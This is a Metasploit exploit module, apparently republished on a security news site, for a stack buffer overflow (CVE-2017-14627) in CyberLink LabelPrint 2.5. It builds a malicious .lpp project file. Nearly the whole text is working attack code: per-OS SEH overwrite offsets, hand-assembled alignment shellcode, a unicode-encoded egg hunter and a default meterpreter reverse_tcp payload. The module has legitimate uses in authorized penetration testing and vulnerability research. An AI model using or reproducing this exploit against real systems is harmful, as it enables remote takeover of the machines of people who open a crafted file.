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CyberLink LabelPrint 2.5 Stack Buffer Overflow
来源:metasploit.com 作者:modpr0be 发布时间:2018-12-12  
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
      'Name'           => "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
      'Description'    => %q{
        This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
        The vulnerability is triggered when opening a .lpp project file containing overly long string characters
        via open file menu. This results in overwriting a structured exception handler record and take over the
        application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
      'License'         => MSF_LICENSE,
      'Author'          =>
          'modpr0be <tom@spentera.id>',       # initial discovery and metasploit module
          'f3ci <marie@spentera.id>'          # unicode kungfu
      'References'      =>
          [ 'CVE', '2017-14627' ],
          [ 'EDB', '42777' ]
      'DefaultOptions'  =>
          'FILENAME' => 'msf.lpp',
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => 'true',
          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
      'Platform'        => 'win',
      'Targets'         =>
          ['CyberLink LabelPrint <= 2.5 on Windows 7 (64 bit)',
              'Ret' => "\x2c\x44",
              'Offset' => 790,
              'Padding1' => 857,
              'Padding2' => 104
          ['CyberLink LabelPrint <= 2.5 on Windows 8.1 x64',
              'Ret' => "\x2c\x44",
              'Offset' => 790,
              'Padding1' => 845,
              'Padding2' => 116
          ['CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803',
              'Ret' => "\x2c\x44",
              'Offset' => 790,
              'Padding1' => 781,
              'Padding2' => 180
      'Payload'         =>
          'Space'       => 15000,
          'DisableNops' => true
      'DisclosureDate'  => 'Sep 23 2017',
      'DefaultTarget'   => 0))

  def get_payload(hunter)
    enc = framework.encoders.create('x86/unicode_mixed')
    enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
    hunter = enc.encode(hunter, nil, nil, platform)

  def exploit
    nop = "\x42"
    junk = 'ABC'.split('').sample              #junk must specifically static (A, B, and C only)
    buffer = ""
    buffer << junk * target['Offset']
    buffer << "\x61\x42"       # nseh
    buffer << target['Ret']    # seh

    #we need to encode the RET address, since RET (\xc3) is known as bad char.
    #preparing address to land the decoded RET
    buffer << nop              #nop/inc edx
    buffer << "\x54"           #push esp
    buffer << nop              #nop/inc edx
    buffer << "\x58"           #pop eax
    buffer << nop              #nop/inc edx
    buffer << "\x05\x1B\x01"   #add eax 01001B00
    buffer << nop              #nop/inc edx
    buffer << "\x2d\x01\x01"   #sub eax 01001000
    buffer << nop              #nop/inc edx
    buffer << "\x50"           #push eax
    buffer << nop              #nop/inc edx
    buffer << "\x5c"           #pop esp

    #preparing RET opcode (c300c300)
    buffer << nop              #nop/inc edx
    buffer << "\x25\x7e\x7e"   #and eax,7e007e00
    buffer << nop              #nop/inc edx
    buffer << "\x25\x01\x01"   #and eax,01000100
    buffer << nop              #nop/inc edx
    buffer << "\x35\x7f\x7f"   #xor eax,7f007f00
    buffer << nop              #nop/inc edx
    buffer << "\x05\x44\x44"   #add eax,44004400
    buffer << nop              #nop/inc edx
    buffer << "\x57"           #push edi as padding, needed to align stack
    buffer << nop              #nop/inc edx
    buffer << "\x50"           #push eax
    buffer << junk * target['Padding1'] #OS specific

    #custom venetian to reach shellcode
    buffer << "\x58"           #pop eax
    buffer << nop              #nop/inc edx
    buffer << "\x58"           #pop eax
    buffer << nop              #nop/inc edx
    buffer << "\x05\x09\x01"   #depending OS
    buffer << nop              #nop/inc edx
    buffer << "\x2d\x01\x01"   #add eax, 01000100, this will align eax to our buffer
    buffer << nop              #nop/inc edx
    buffer << "\x50"           #push eax
    buffer << nop              #nop/inc edx

    #crafting call esp at 0x7c32537b (MFC71U.dll) to make a jump using call esp
    buffer << "\x5C"           #pop esp
    buffer << nop              #nop/inc edx
    buffer << "\x58"           #pop eax
    buffer << nop              #nop/inc edx
    buffer << "\x05\x53\x7c"   #add eax 7c005300 part of call esp
    buffer << nop              #nop/inc edx
    buffer << "\x50"           #push eax
    buffer << junk * target['Padding2'] #OS specific
    buffer << "\x7b\x32"       #part of call esp

    #preparing for jump to shellcode, placing in eax.
    buffer << junk * 114       #junk
    buffer << "\x57"           #push edi
    buffer << nop              #nop/inc edx
    buffer << "\x58"           #pop eax
    buffer << nop              #nop/inc edx
    buffer << "\x05\x0A\x01"   #depending OS
    buffer << nop              #nop/inc edx
    buffer << "\x2d\x01\x01"   #sub eax,01000100
    buffer << nop              #nop/inc edx
    buffer << get_payload(payload.encoded)
    buffer << junk * (payload.space-buffer.length)      #fill the rest of buffer, must be added.

    lpp_data = <<-EOS
    <PROJECT version="1.0.00">
      <INFORMATION title="" author="" date="#{rand(1..12)}/#{rand(1..28)}/#{(1970..2020).to_a.sample}" SystemTime="#{rand(1..12)}/#{rand(1..28)}/#{(1970..2020).to_a.sample}">
        <TRACK name="#{buffer}" />

    print_status("Creating '#{datastore['FILENAME']}' file ...")

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